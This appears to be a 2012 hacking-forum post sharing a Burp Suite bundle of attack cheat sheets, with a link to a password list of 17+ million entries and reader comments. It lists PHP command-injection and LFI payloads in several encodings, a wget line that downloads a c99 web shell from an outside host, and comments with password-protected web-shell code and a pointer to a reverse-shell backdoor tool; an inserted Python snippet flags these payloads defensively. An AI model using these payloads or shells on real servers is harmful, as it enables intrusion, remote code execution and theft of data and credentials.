BurpSuite v1.4 & loads of cheat sheet docs.
24-03-2012 10:12pm
Burpsuite can also be downloaded from here.
http://portswigger.net/burp/download.html
Example of zip contents and cheat sheet docs:
Contents of LFI folder:
Contents of LFI-InterestingFiles.txt:
SQLi2Shell folder, file Basic-cmd-code.txt:
<?system('id');?>
<?system('uname -a');?>
<?php phpinfo(); ?>
<?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?>
<? system($_GET['c']); ?>
0x3c3f2073797374656d28245f4745545b2763275d293b203f3e
PD8gc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==
%3C%3F%20system%28%24_GET%5B%27c%27%5D%29%3B%20%3F%3E
char(60,63,32,115,121,115,116,101,109,40,36,95,71,69,84,91,39,99,39,93,41,59,32,63,62)
data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami
data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=wget http://www.sh3ll.org/c99.txt -O shell.php
php://filter/resource=http://www.sh3ll.org/c99.txt?
php://filter/convert.base64-encode/resource=index
php://filter/convert.base64-encode/resource=index.php
data:;base64,<? exec($_GET[cmd]); ?>&cmd=whoami
There is loads of good info in the txt files, and there are 17+ million passwords.
Download here:
http://uploading.com/files/189f32f1/BURP-testHR-.zip/
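Seen from the defending side, the Basic-cmd-code.txt entries above are one PHP one-liner in several encodings plus PHP stream-wrapper values. This added example (not part of the original post or of the zip) decodes each query-string value the same ways and flags what it finds. The regexes, finding labels and request targets are assumptions constructed here; the parameter values are the strings quoted in the post.

```python
import base64
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Heuristics for the payload styles quoted in the post; assumed, not exhaustive.
PHP_EXEC = re.compile(r"<\?(?:php)?\s*(?:system|exec|passthru|shell_exec)\s*\(", re.I)
WRAPPER = re.compile(r"^(?:php://|data:)", re.I)
CHAR_FN = re.compile(r"^char\(([\d,\s]+)\)$", re.I)
HEX_LIT = re.compile(r"^0x((?:[0-9a-f]{2})+)$", re.I)
B64 = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")

def decodings(value):
    """Yield the value itself plus every alternate decoding that applies."""
    yield value
    if m := CHAR_FN.match(value):          # SQL char(60,63,...) form
        yield "".join(chr(int(c) & 0xFF) for c in re.findall(r"\d+", m.group(1)))
    if m := HEX_LIT.match(value):          # SQL 0x... hex literal
        yield bytes.fromhex(m.group(1)).decode("latin-1")
    blob = value.split("base64,", 1)[-1]   # bare base64 or data:;base64,<blob>
    if B64.match(blob) and len(blob) % 4 == 0:
        try:
            yield base64.b64decode(blob, validate=True).decode("latin-1")
        except ValueError:                 # binascii.Error is a ValueError
            pass

def classify(target):
    """Return sorted finding labels for one request target (path?query)."""
    findings = set()
    for pair in urlsplit(target).query.split("&"):
        raw = pair.partition("=")[2]
        for value in {unquote(raw), unquote_plus(raw)}:
            if WRAPPER.match(value):
                findings.add("stream-wrapper")
            if any(PHP_EXEC.search(text) for text in decodings(value)):
                findings.add("php-exec")
    return sorted(findings)

# Constructed request targets; parameter values are the forms quoted in the post.
SAMPLES = [
    "/index.php?page=about&id=12345678",
    "/index.php?page=php://filter/convert.base64-encode/resource=index.php",
    "/index.php?page=data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami",
    "/item.php?id=PD8gc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==",
    "/item.php?id=%3C%3F%20system%28%24_GET%5B%27c%27%5D%29%3B%20%3F%3E",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target) or "clean", target[:60])
```

The same `classify` call also catches the `0x...` and `char(...)` forms; in production the input would be the request field parsed out of the web server's access log.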
Comments
WTF "sh3ll.org"... Change that if I was you
Don't we know that they had a *slight* tendency to backdoor their webshells? They are also 404 at the moment...
They *may* have cleaned them up, but a few months ago their c99 had a function that mailed its URL to some email account.
BTW, I have a massive repo of those C99 variants and similar over at:
http://code.google.com/p/web-malware-collection/
It's only to give a guide, anyway you should always use your own shell. You're right, the sh3ll.org/c99.txt probably is backdoored.
If you were to use an untrusted shell you could always password protect it as soon as you upload it with something like:

<?php
$auth = 1;
$name='2d5faffb6ac2a8844c05386b381c4282'; //MD5 Encrypt name. Default name = 900913
$pass='97a37c0a629997e6c51116e0f8340404'; //MD5 Encrypt pass. Default pass = P4s5W0rD_900913
if($auth == 1) {
    if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
    {
        header('WWW-Authenticate: Basic realm="HELLO!"');
        header('HTTP/1.0 401 Unauthorized');
        exit("<b>????????? ???</b>");
    }
}
?>
//Shell goes here.
<pre> <?PHP include($_GET[d]);?> </pre>;
<pre> <?PHP Passthru($_GET[cmd]);?> </pre>;
And then patch the vulnerability in the site/server.
Here's a good free online tool for encoding/encrypting php scripts.
http://tools88.com/safe/online_base64_decode.php
:-)
Well as for shells w/ builtin protection - simply uploading the output from the following tool is my personal favourite (and is very often shown in my demos)
http://code.google.com/p/weevely/
It is quite possibly the most "friendly" backdoor, as it allows instant reverseshell (via /dev/tcp) and other useful things
Just output and pop it on your own host. Then use that in future